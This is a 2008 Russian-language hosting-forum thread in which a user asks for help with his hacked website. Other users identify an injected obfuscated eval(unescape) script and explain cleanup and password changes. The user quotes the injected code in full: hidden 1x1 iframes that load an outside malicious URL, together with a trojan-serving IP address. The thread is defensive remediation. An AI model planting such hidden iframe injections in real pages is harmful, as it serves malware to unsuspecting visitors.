Ayola.net
Новости: В связи с обилием спама, постинг на форуме временно закрыт.

Для связи с поддержкой используйте тикеты в панели управления.
 
*
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь. Январь 23, 2017, 10:31:44


Войти


Страниц: [1]
  Печать  
Автор Тема: Инфецированный Сайт  (Прочитано 5759 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Soldier Ghost
Новичёк
*

Карма: 0
Сообщений: 18


Просмотр профиля
« : Март 21, 2008, 02:16:15 »

Обращаюсь к адменистрации и к людям которые могут памочь
Дело в том что у меня сайт инфецированный вот адрес www.bullet-cs.info или www.bullet.cwx.ru когда заходиш на сайт без включённого анивируса то комп сразу перегружают какието процессы и начинает виснуть а когда зходиш второй раз то браузер перекидывает на какойто сайт с антитварью вот я не магу понять почему он заражён ведь я даже туда ни чё не закачивал просто не с того не сего!!! Я его проверял касперским 7 с последними обнавлениями но он ни чего не нашёл админы если вы можете то помагите только не удаляйте его пожалуйста если это запрещенно то можете просто его закрыть на время
Помагите чё делать?  Плачущий
Записан
Soldier Ghost
Новичёк
*

Карма: 0
Сообщений: 18


Просмотр профиля
« Ответ #1 : Март 21, 2008, 11:47:52 »

Когда заходиш на сайт то на твой комп сразу грузится Троян downloader вот с этого ip http://206.161.200.42/
Записан
atimur
Просветлённый
****

Карма: 59
Сообщений: 990


Живу в SanCity


Просмотр профиля WWW
« Ответ #2 : Март 21, 2008, 12:31:46 »

На титульной странице между "Content Management Powered by CuteNews " и "Оффициальный Сайт команды Bullet" находится элемент "--><script>eval(unescape .... ;</script><!--" нужно его удалить! через Админку или зайдя по ftp и удалив в ручную.

1/ На незнакомые сайты можно заходить без включенного JS либо с браузером типа  Firefox где такие конструкции по умолчанию незапускаются.
2/ подобный скрипт кроме загрузки трояна может спокойно увезти кукисы для сайта, тем самым пароли от сайта окажутся не в тех руках.
3/ меняйте пароли.
« Последнее редактирование: Март 21, 2008, 12:42:48 от atimur » Записан

- Правда, она всегда глаза режет...
- Капча - Идите лесом...
DLE user
Маэстро
*****

Карма: 78
Сообщений: 1692



Просмотр профиля WWW
« Ответ #3 : Март 21, 2008, 12:42:42 »

хех троян в ява скрипте Улыбающийся Ненавижу Улыбающийся)
Ксати ауола же вроде проводит антивирусные проверки. Мне вот интересно ели они нашли на сайте вирь они его блочат и всё?
« Последнее редактирование: Март 21, 2008, 12:44:46 от DLE user » Записан
atimur
Просветлённый
****

Карма: 59
Сообщений: 990


Живу в SanCity


Просмотр профиля WWW
« Ответ #4 : Март 21, 2008, 12:55:12 »

Эта строка всего лиш сЦылка на загрузку виря/трояна в виде escape последовательности (она же негрузит на хостинг эту гадость, она грузит ее неосторожным юзверям при заходе на сайт).
Записан

- Правда, она всегда глаза режет...
- Капча - Идите лесом...
DLE user
Маэстро
*****

Карма: 78
Сообщений: 1692



Просмотр профиля WWW
« Ответ #5 : Март 21, 2008, 12:59:31 »

А...понятно.
Записан
Soldier Ghost
Новичёк
*

Карма: 0
Сообщений: 18


Просмотр профиля
« Ответ #6 : Март 21, 2008, 13:20:09 »

Решение проблемы я нашёл этот скрипт добавляется во все индексные страницы сайта за пределами тэгов (в самом конце) вот что он из себя представляет

__<iframe src__='http://sun-5.org/in.cgi?default' width='1' height='1' style='visibility: hidden;'></iframe><iframe src='http://sun-5.org/in.cgi?default' width='1' height='1' style='visibility: hidden;'></iframe><iframe src='http://sun-5.org/in.cgi?default' width='1' height='1' style='visibility: hidden;'></iframe>__
Проверьте все свои индексные страницы возможно у вас тоже есть такое если есть удаляйте! всем спасибо

atimur
Спасибо я уже его нашёл если не трудно проверь ещё раз
Люди у меня вапрос как сменить пароль на аёле чёт я не магу понять вроде всю панель акка облазил а там ничего О_о

« Последнее редактирование: Март 21, 2008, 13:22:30 от Soldier Ghost » Записан
atimur
Просветлённый
****

Карма: 59
Сообщений: 990


Живу в SanCity


Просмотр профиля WWW
« Ответ #7 : Март 21, 2008, 13:36:17 »

В данный момент его (сЦылки) там нет. (он виден был на всех страницах потому что этот шаблон tpl распространялся  на весь сайт).

Пароль по идее сменить можно и http://www.ayola.net/pass.php вышлют новый на зареганое мыло.
Записан

- Правда, она всегда глаза режет...
- Капча - Идите лесом...
Soldier Ghost
Новичёк
*

Карма: 0
Сообщений: 18


Просмотр профиля
« Ответ #8 : Март 21, 2008, 13:41:40 »

Пытаюсь поменять вот что пишет
Регистрационная информация отправлена.
А других способов нет?
Записан
atimur
Просветлённый
****

Карма: 59
Сообщений: 990


Живу в SanCity


Просмотр профиля WWW
« Ответ #9 : Март 21, 2008, 13:46:51 »

Писать письмо на support@ayola.ru с указанием всего, чего помните. Кроме того, писать обязательно с ящика, который указывали при регистрации.
Записан

- Правда, она всегда глаза режет...
- Капча - Идите лесом...
Soldier Ghost
Новичёк
*

Карма: 0
Сообщений: 18


Просмотр профиля
« Ответ #10 : Март 21, 2008, 13:53:30 »

Понятна спс
Записан
tzps@ayola.ru
Модератор
Маэстро
*****

Карма: 79
Сообщений: 1695



Просмотр профиля WWW
« Ответ #11 : Март 21, 2008, 14:24:24 »

Писать письмо на support@ayola.ru с указанием всего, чего помните. Кроме того, писать обязательно с ящика, который указывали при регистрации.
Тикет пишите из панели управления.
Записан

Soldier Ghost
Новичёк
*

Карма: 0
Сообщений: 18


Просмотр профиля
« Ответ #12 : Март 21, 2008, 14:27:22 »

Я уже письмо отослал Улыбающийся
Записан
Страниц: [1]
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.13 | SMF © 2006, Simple Machines LLC

2003-2008 © ООО "Инфотур" - Бесплатный хостинг Ayola.net
Valid XHTML 1.0! Valid CSS! Dilber MC Theme by HarzeM
Страница сгенерирована за 0.14 секунд. Запросов: 17.